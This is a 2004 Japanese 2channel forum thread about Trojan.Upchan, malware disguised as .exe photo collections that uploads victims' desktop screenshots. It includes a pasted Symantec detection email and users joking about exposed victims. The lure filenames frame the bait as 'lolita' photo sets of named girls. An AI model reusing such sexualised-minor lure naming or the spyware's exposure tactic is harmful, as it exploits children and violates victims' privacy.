843 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:18:48 ID:qaAkrrtW]: >>840
837で爆笑
844 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:22:49 ID:L1ZU8rVo]: >841
ﾄﾞｿﾞｰ
that3.2ch.net/test/read.cgi/gline/1095873352/l50
845 名前：627 mailto:sage [04/09/23 16:24:41 ID:Q+leSqll]: ノートン先生から解析結果が届いたのでコピペします。
-------------------------------------------------------------------
Subject:[CLOSING]: Symantec Security Response Automation:Tracking No. ********

日付: 22-09-2004
(個人情報に付き削除) 様

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: Q:\2ch\(写真集) (ロリータ) 水原友里.exe
コンピュータ: (個人情報に付き削除)
結果: このファイルは次のウィルスに感染しています:
Trojan.Upchan
デベロッパーノート
:
Q:\2ch\(写真集) (ロリータ) 水原友里.exe is non-repairable threat.
NAV with the latest rapidrelease definition detects this. Please delete this file and replace it if neccessary.
Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。

個別対応版定義ファイルのインストール方法：
1. 添付された定義ファイルの更新版を保存します。
2. 保存したファイルをダブルクリックし、画面の指示に従って操作します。
-------------------------------------------------------------------
846 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:26:59 ID:t4uJAFpV]: >>845
Upchanって・・・。それにしても対応早いな。
バスターまだ～（AA略）
847 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:28:51 ID:Pi3bt/OK]: >保存したファイルをダブルクリックし、画面の指示に従って操作します。
ICHIGOｳｲﾙｰｽに感染した香具師はﾄﾗｳﾏに…
848 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:30:52 ID:62NRg8JO]: >>845 おぉ先生きたか
　　　　 >Trojan.Upchan 　あっぷちゃん、もしくはうぷちゃん　
　　　　苺キンタマは却下かｗ
849 名前：627 mailto:sage [04/09/23 16:33:37 ID:Q+leSqll]: 添付されていた定義パッチで
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
を「Trojan.Upchan」として検出できることを確認。

というわけで一般向けには次回定義更新時の定義でサポートされると思われ。

>>846
バスターの検体提出方法は不明だが
ノートン先生見たく検疫ソフトで送信できるなら誰か持ってる奴が送信した方がはやいよ。
850 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:41:53 ID:soiSa9lC]: 35 名前：水先案名無い人[sage] 投稿日：04/09/23 02:23:45 ID:ccAq4UYb
簡単な説明

とある人物がうｐロダにうｐられているexeを実行

そのexeはキンタマウィルスと同じようなデスクトップ画像を晒されるウィルス入り
このウィルスは8分置きに2chうｐロダにデスクトップ画像をうｐられ角煮のアップローダスレに自動で書き込まれる

そしてこのウィルスにかかっている事を知った当の本人は必死になって削除方法検索
その時の検索ワードが「exe ファイル捨てたい」
この検索結果の画像を上記に書かれているウィルスによって自動でスレに書き込まれスレ住人を爆笑の渦へ

おわり

↑わるいがﾜﾛﾀ
851 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:45:57 ID:cDvdfQLH]: 俺でさえも（ｒｙ　は対策しないんだなｗ
852 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:52:19 ID:pr4shzQV]: バスター更新ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
けど、対応してるのかな

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef